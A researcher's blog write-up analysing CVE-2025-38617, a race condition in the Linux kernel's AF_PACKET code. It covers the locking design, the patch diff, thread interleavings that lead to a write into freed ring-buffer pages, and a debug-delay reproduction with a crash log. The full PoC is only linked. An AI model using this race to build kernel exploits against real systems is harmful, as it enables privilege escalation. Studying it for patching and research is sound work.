A Quick Note on CVE-2025-38617

This vulnerability is a race condition in net/packet, which was exploited in kernelCTF. The corresponding patch commit can be found here.

Note: I tried to analyze this without looking at the commit details, which helped me realize the perspective I had missed when it comes to finding vulnerabilities. As a result, there are many side notes (or personal insights) in this post.

1. Introduction

The protocol operation table for the AF_PACKET socket is packet_ops, whose setsockopt handler is packet_setsockopt() [1].

static const struct proto_ops packet_ops = {
    .family = PF_PACKET,
    // [...]
    .setsockopt = packet_setsockopt, // [1]
    // [...]
};

The handler supports several options, some of which call the function packet_set_ring() [2] to configure the TX and RX ring buffers. In general, almost all socket handlers (not limited to AF_PACKET) acquire the socket lock by calling lock_sock(sk) [3] before modifying the socket object or its private data.

static int
packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
          unsigned int optlen)
{
    // [...]
    switch (optname) {
    // [...]
    case PACKET_RX_RING:
    case PACKET_TX_RING:
    {
        // [...]
        lock_sock(sk); // [3]
        if (!ret)
            ret = packet_set_ring(sk, &req_u, 0, // [2]
                          optname == PACKET_TX_RING);
        release_sock(sk);
    }
    // [...]
    }
    // [...]
}

packet_setsockopt() first calculates the ring buffer size and allocates memory. It then stops the socket before updating its metadata and resumes it afterward to avoid concurrent access to the objects.

In total, three locks are used to protect against race conditions. First, the lock po->bind_lock [3, 4] is used to guard concurrent registration and unregistration. Registration means the socket is running with the flag PACKET_SOCK_RUNNING set, allowing it to be accessed at any time; unregistration, on the other hand, means the socket is inactive and cannot be accessed.

The lock po->pg_vec_lock is used to protect concurrent access to rb->pg_vec[] [5], while rb_queue->lock is used to protect the skb queue [6].

static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
        int closing, int tx_ring)
{
    // [...]
    spin_lock(&po->bind_lock); // [3] unregister
    was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING);
    num = po->num;
    if (was_running) {
        WRITE_ONCE(po->num, 0);
        __unregister_prot_hook(sk, false);
    }
    spin_unlock(&po->bind_lock);
    
    mutex_lock(&po->pg_vec_lock); // [5]
    if (closing || atomic_long_read(&po->mapped) == 0) {
        // [...]
        
        spin_lock_bh(&rb_queue->lock); // [6]
        swap(rb->pg_vec, pg_vec);
        if (po->tp_version <= TPACKET_V2)
            swap(rb->rx_owner_map, rx_owner_map);
        spin_unlock_bh(&rb_queue->lock);
        
        // [...]
        
        swap(rb->pg_vec_order, order);
        swap(rb->pg_vec_len, req->tp_block_nr);
        
        // [...]

        skb_queue_purge(rb_queue);

        // [...]
    }
    mutex_unlock(&po->pg_vec_lock);

    spin_lock(&po->bind_lock); // [4] register
    if (was_running) {
        WRITE_ONCE(po->num, num);
        register_prot_hook(sk);
    }
    spin_unlock(&po->bind_lock);

    // [...]
}

2. Analysis

2.1. Surface-level

To gain a deeper understanding of this vulnerability, rather than simply treating it as a race condition, we can analyze the design and identify why so many locks are required.

The socket is stopped before updating the metadata. Perhaps something problematic occurs if the socket is running while the metadata is being updated? To prevent concurrent access, one option would be to hold po->bind_lock for the entire critical section. However, skb_queue_purge() may take a long time if the queue is filled with many skbs, creating a performance bottleneck. Thus, this is not a good solution.

As a result, the process is divided into three parts: first, the socket is stopped with the spin lock acquired; second, the ring buffer is updated under the protection of a mutex lock; and finally, the socket is resumed.

But now you may have some questions:

Is there any data protected by po->bind_lock that could be subject to a race between the two lock operations?
Clearly, register_prot_hook() can be called by another thread right after the unregistration.
What happens if __unregister_prot_hook() is called twice by another thread?

For the first question, po->bind_lock seems to be used mainly to protect socket state transitions rather than raw data, so not much data is actually modified under this lock.

For the second and third questions, we need to identify functions that can race with registration or unregistration. Interestingly, the only function that does not acquire the socket lock (lock_sock(sk)) is packet_notifier(). Therefore, this function can be used to trigger a race condition.

This function is the notifier handler for AF_PACKET sockets [1], and it is invoked when the state of the corresponding device associated with a socket is updated. For example, deactivating an active device will trigger a NETDEV_DOWN event, which is then dispatched to the sockets.

static struct notifier_block packet_netdev_notifier = {
    .notifier_call = packet_notifier, // [1]
};

The packet_notifier() function iterates over all in-use sockets [2]. If the event is NETDEV_DOWN, it calls __unregister_prot_hook() [3] under po->bind_lock [4], provided that the socket is running. If the event is NETDEV_UP, it calls register_prot_hook() [5], also under po->bind_lock [6], when po->num is not zero.

static int packet_notifier(struct notifier_block *this,
               unsigned long msg, void *ptr)
{
    struct net_device *dev = netdev_notifier_info_to_dev(ptr);
    struct net *net = dev_net(dev);
    struct packet_mclist *ml, *tmp;
    LIST_HEAD(mclist);
    struct sock *sk;

    rcu_read_lock();
    sk_for_each_rcu(sk, &net->packet.sklist) { // [2]
        struct packet_sock *po = pkt_sk(sk);

        switch (msg) {
        // [...]
        case NETDEV_DOWN:
            if (dev->ifindex == po->ifindex) {
                spin_lock(&po->bind_lock); // [4]
                if (packet_sock_flag(po, PACKET_SOCK_RUNNING)) {
                    __unregister_prot_hook(sk, false); // [3]
                    // [...]
                }
                // [...]
                spin_unlock(&po->bind_lock);
            }
            break;
        case NETDEV_UP:
            if (dev->ifindex == po->ifindex) {
                spin_lock(&po->bind_lock); // [6]
                if (po->num)
                    register_prot_hook(sk); // [5]
                spin_unlock(&po->bind_lock);
            }
            break;
        }
    }
    rcu_read_unlock();
    // [...]
    return NOTIFY_DONE;
}

We have now identified a function that can race with registration and unregistration, so let’s address the second and third questions.

The register_prot_hook() function can only be called if the socket is running [7]. Therefore, the second question poses no issue.

static void register_prot_hook(struct sock *sk)
{
    // [...]
    __register_prot_hook(sk);
}

static void __register_prot_hook(struct sock *sk)
{
    struct packet_sock *po = pkt_sk(sk);

    if (!packet_sock_flag(po, PACKET_SOCK_RUNNING)) { // [7]
        if (po->fanout)
            __fanout_link(sk, po);
        else
            dev_add_pack(&po->prot_hook);

        sock_hold(sk);
        packet_sock_flag_set(po, PACKET_SOCK_RUNNING, 1);
    }
}

For the third question, although the function __unregister_prot_hook() itself does not check the socket state, its invocation within packet_notifier() requires the socket to be running. Therefore, it cannot be unregistered multiple times.

static void __unregister_prot_hook(struct sock *sk, bool sync)
{
    struct packet_sock *po = pkt_sk(sk);

    // [...]
    packet_sock_flag_set(po, PACKET_SOCK_RUNNING, 0);

    if (po->fanout)
        __fanout_unlink(sk, po);
    else
        __dev_remove_pack(&po->prot_hook);

    __sock_put(sk);
    // [...]
}

So, what’s the problem is?

2.2. In-depth

Since I had no clear idea at first 😭, I finally got some hints from the commit message. Then I noticed that the state transition operations between packet_notifier() and packet_set_ring() are slightly different.

In packet_set_ring(), the check for __unregister_prot_hook() is the same as the one in packet_notifier(), with both depending on the PACKET_SOCK_RUNNING flag.

However, for register_prot_hook(), the check in packet_set_ring() depends on whether the socket was temporarily running (was_running), which makes sense. In contrast, the check in packet_notifier() relies on whether the po->num value is non-zero [1], instead of checking the running flag.

static int packet_notifier(struct notifier_block *this,
               unsigned long msg, void *ptr)
{
    // [...]
    sk_for_each_rcu(sk, &net->packet.sklist) {
        struct packet_sock *po = pkt_sk(sk);

        switch (msg) {
            // [...]
            case NETDEV_UP:
            if (dev->ifindex == po->ifindex) {
                spin_lock(&po->bind_lock);
                if (po->num) // [1]
                    register_prot_hook(sk);
                spin_unlock(&po->bind_lock);
            }
            break;
        }
    }
    // [...]
}

So, we can first create an AF_PACKET socket and then shut down the device. At this point, the target socket’s po->num is not zero, but the running flag is not set.

After that, we create two threads to execute the following flow:

[thread-1]                      [thread-2]
__sys_sendmsg()                 packet_set_ring()
 ...
 do_setlink()
  ...
  notifier_call_chain()
   packet_notifier()
                                spin_lock(&po->bind_lock)
                                was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING)
                                /* was_running == false, so do nothing */
                                spin_unlock(&po->bind_lock)

    spin_lock(&po->bind_lock)
    register_prot_hook(sk) /* activate the socket */
    spin_unlock(&po->bind_lock)

                                ... [=== CONTINUE WITH SOCKET REGISTERED ===]
                                

Consequently, packet_set_ring() continues to execute and modifies metadata while the socket is registered and able to receive packets.

To verify our idea, we can refer to the patch diff. The patch addresses this race condition by temporarily setting po->num to zero, even when the socket is inactive, ensuring that the socket cannot be activated while metadata is being updated.

     spin_lock(&po->bind_lock);
     was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING);
     num = po->num;
-    if (was_running) {
-        WRITE_ONCE(po->num, 0);
+    WRITE_ONCE(po->num, 0);
+    if (was_running)
         __unregister_prot_hook(sk, false);
-    }

3. Find Exploit Path

3.1. First Try

But what can we do if the race condition hits?

The registration handler calls either __fanout_link() [1] or dev_add_pack() [2], depending on whether po->fanout exists. Internally, __fanout_link() also calls dev_add_pack() [3].

static void __register_prot_hook(struct sock *sk)
{
    struct packet_sock *po = pkt_sk(sk);

    if (!packet_sock_flag(po, PACKET_SOCK_RUNNING)) {
        if (po->fanout)
            __fanout_link(sk, po); // [1]
        else
            dev_add_pack(&po->prot_hook); // [2]

        // [...]
        packet_sock_flag_set(po, PACKET_SOCK_RUNNING, 1);
    }
}

static void __fanout_link(struct sock *sk, struct packet_sock *po)
{
    struct packet_fanout *f = po->fanout;

    spin_lock(&f->lock);
    rcu_assign_pointer(f->arr[f->num_members], sk);
    // [...]
    f->num_members++;
    if (f->num_members == 1)
        dev_add_pack(&f->prot_hook); // [3]
    spin_unlock(&f->lock);
}

The dev_add_pack() handler is called to add packet object to list [4].

void dev_add_pack(struct packet_type *pt)
{
    struct list_head *head = ptype_head(pt);

    // [...]
    spin_lock(&ptype_lock);
    list_add_rcu(&pt->list, head); // [4]
    spin_unlock(&ptype_lock);
}

If the socket is in the head list, it can receive packets from the network softirq asynchronously. Therefore, we need to pay attention to fields that are accessed after the unregistration check in packet_set_ring(), as this data may still be used in the receive handler.

static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
        int closing, int tx_ring)
{
    struct sk_buff_head *rb_queue;

    // [...]
    rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue;

    // [...]
    mutex_lock(&po->pg_vec_lock);
    
    spin_lock_bh(&rb_queue->lock);
    swap(rb->pg_vec, pg_vec);
    // [...]
    swap(rb->rx_owner_map, rx_owner_map);
    rb->frame_max = (req->tp_frame_nr - 1);
    rb->head = 0;
    rb->frame_size = req->tp_frame_size;
    spin_unlock_bh(&rb_queue->lock);

    swap(rb->pg_vec_order, order);
    swap(rb->pg_vec_len, req->tp_block_nr);

    rb->pg_vec_pages = req->tp_block_size/PAGE_SIZE;
    po->prot_hook.func = (po->rx_ring.pg_vec) ?
                    tpacket_rcv : packet_rcv;
    skb_queue_purge(rb_queue);
    // [...]
    mutex_unlock(&po->pg_vec_lock);

    // [...]
out_free_pg_vec:
    if (pg_vec) {
        bitmap_free(rx_owner_map);
        free_pg_vec(pg_vec, order, req->tp_block_nr);
    }
}

Unfortunately, I cannot find an exploit path to leverage this race condition. Some ideas and attempts are listed below.

Being registered also means the socket can receive packets, and dev_add_pack() enables the network stack IRQ handler to dispatch the skb to this socket. With this race, the socket can now receive skbs while updating the metadata, so issues may occur when the receive hook function is invoked.

skb_queue_purge() splices skbs in the queue to a temporary list and frees them under the head skb’s ->lock, while the receive handler calls __skb_queue_tail() under the socket object’s ->sk_receive_queue. This potentially introduces race condition issues.

However, the receive handler processes skbs without obvious mistakes, which blocks me from analyzing it further.

3.2. Second Try

One day later, I still had no idea, so I DM’d the report author (quangle97) to ask for some guidance, and he generously shared many of his insights and the exploit path with me. I really appreciate his kindness and willingness to share :).

Overall, my analysis direction was correct, but I failed to fully review/understand the receive handler, which internally holds a reference to data that will later be freed in packet_set_ring(). So, let’s go back and analyze the implementation of the receive handler.

A packet socket with page vector enabled uses tpacket_rcv() as its receive handler. This function calls packet_current_rx_frame() to obtain a data buffer [1] under the receive queue lock [2]. The data buffer is then used to populate fields [3] related to the network link layer.

static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
               struct packet_type *pt, struct net_device *orig_dev)
{
    struct sockaddr_ll *sll;

    // [...]
    spin_lock(&sk->sk_receive_queue.lock); // [2]
    h.raw = packet_current_rx_frame(po, skb, // [1]
                    TP_STATUS_KERNEL, (macoff+snaplen));
    // [...]
    spin_unlock(&sk->sk_receive_queue.lock);
    // [...]

    sll = h.raw + TPACKET_ALIGN(hdrlen); // [3]
    sll->sll_halen = dev_parse_header(skb, sll->sll_addr);
    sll->sll_family = AF_PACKET;
    sll->sll_hatype = dev->type;
    sll->sll_protocol = (sk->sk_type == SOCK_DGRAM) ?
    // [...]
}

If the socket version is v1 or v2, packet_lookup_frame() is called [4] to retrieve a page buffer [5] from the page vector, which is allocated in packet_set_ring().

static void *packet_current_rx_frame(struct packet_sock *po,
                        struct sk_buff *skb,
                        int status, unsigned int len)
{
    char *curr = NULL;
    switch (po->tp_version) {
    case TPACKET_V1:
    case TPACKET_V2:
        curr = packet_lookup_frame(po, &po->rx_ring, // [4]
                    po->rx_ring.head, status);
        return curr;
    // [...]
    }
}

static void *packet_lookup_frame(const struct packet_sock *po,
                 const struct packet_ring_buffer *rb,
                 unsigned int position,
                 int status)
{
    unsigned int pg_vec_pos, frame_offset;
    union tpacket_uhdr h;

    pg_vec_pos = position / rb->frames_per_block;
    frame_offset = position % rb->frames_per_block;

    h.raw = rb->pg_vec[pg_vec_pos].buffer + // [5]
        (frame_offset * rb->frame_size);

    // [...]
    return h.raw;
}

However, the buffer will be freed at the end of packet_set_ring(). With the following execution flow, this race condition allows arbitrary data to be written into a freed page:

[thread-1]                      [thread-2]                            [thread-3]
__sys_sendmsg()                 packet_set_ring()
 ...
 do_setlink()
  ...
  notifier_call_chain()
   packet_notifier()
                                 spin_lock(&po->bind_lock)
                                 was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING)
                                 /* was_running == false, so do nothing */
                                 spin_unlock(&po->bind_lock)
                                 ...
    spin_lock(&po->bind_lock)
    register_prot_hook(sk) /* activate the socket */
    spin_unlock(&po->bind_lock)
    ...
                                                                       tpacket_rcv()
                                                                        spin_lock(&sk->sk_receive_queue.lock)
                                                                        h.raw = packet_current_rx_frame(po)
                                                                         packet_lookup_frame(&po->rx_ring)
                                                                          return h.raw = rb->pg_vec[pg_vec_pos].buffer
                                                                        spin_unlock(&sk->sk_receive_queue.lock)
                                                                        ...
                                spin_lock_bh(&rb_queue->lock)
                                swap(rb->pg_vec, pg_vec)
                                spin_unlock_bh(&rb_queue->lock)

                                free_pg_vec(pg_vec)
                                 free_pages(pg_vec[i].buffer, order)
                                ...
                                                                        sll = h.raw + TPACKET_ALIGN(hdrlen)
                                                                        sll->sll_halen = ...  [=== WRITE TO FREE PAGE ===]

4. Proof-Of-Concept

To reproduce it more easily, I added some delays in critical functions: tpacket_rcv() and packet_set_ring().

diff --git a/net/packet/af_packet_bk.c b/net/packet/af_packet.c
index 4abf7e9..e23fbcb 100644
--- a/net/packet/af_packet_bk.c
+++ b/net/packet/af_packet.c
@@ -2507,6 +2507,7 @@ static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
                BUG();
        }
 
+       mdelay(10000);
        sll = h.raw + TPACKET_ALIGN(hdrlen);
        sll->sll_halen = dev_parse_header(skb, sll->sll_addr);
        sll->sll_family = AF_PACKET;
@@ -4574,6 +4575,7 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
        spin_unlock(&po->bind_lock);
 
        synchronize_net();
+       mdelay(3000);
 
        err = -EBUSY;
        mutex_lock(&po->pg_vec_lock);

Once the race condition is hit, a kernel panic is triggered due to a null pointer dereference.

[   36.191917] BUG: kernel NULL pointer dereference, address: 0000000000000000                                                     
[   36.191917] #PF: supervisor read access in kernel mode                                                                          
[   36.191917] #PF: error_code(0x0000) - not-present page                                                                          
[   36.191917] PGD 105c10067 P4D 105c10067 PUD 105c0f067 PMD 0                                                                     
[   36.191917] Oops: 0000 [#1] PREEMPT SMP NOPTI                                                                                   
[   36.191917] CPU: 1 PID: 188 Comm: test Not tainted 6.6.94 #5                                                                    
[   36.191917] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-5 04/01/2014                       
[   36.191917] RIP: 0010:tpacket_rcv+0xac4/0xdb0                                                                                   
[   36.191917] Code: 87 00 05 00 00 4c 8b 04 24 83 f8 01 0f 84 80 01 00 00 83 f8 02 75 49 8b 44 24 18 41 89 40 14 49 8b 87 50 03 0c
[...]
[   36.191917] Call Trace:
[   36.191917]  <TASK>
[   36.191917]  dev_queue_xmit_nit+0x292/0x2d0
[   36.191917]  dev_hard_start_xmit+0xa5/0x220
[   36.191917]  __dev_queue_xmit+0x248/0xde0
[   36.191917]  ? packet_parse_headers+0x152/0x240
[   36.191917]  packet_sendmsg+0x9f9/0x17e0
[   36.191917]  ? packet_sendmsg+0x1279/0x17e0
[   36.191917]  __sys_sendto+0x1fb/0x210
[   36.191917]  __x64_sys_sendto+0x20/0x30
...

The poc code can be found here. It should be run in a namespace with root privileges because of the use of AF_PACKET.

5. Conclusion

At a low level, finding race conditions involves reviewing which fields are accessed by functions without holding a lock. At a higher level, we need to understand why developers introduced the lock and what kinds of race situations they intended to protect against. Both perspectives are important, and I am still refining my strategy for identifying racy issues.

Moreover, some race condition may seem harmless at first glance, such as state transition races, but upon closer examination they can lead to memory corruption issues. Beside this vulnerability, the CVE-2024-50264 is also a good example.

Thanks again to quangle97 for answering my questions!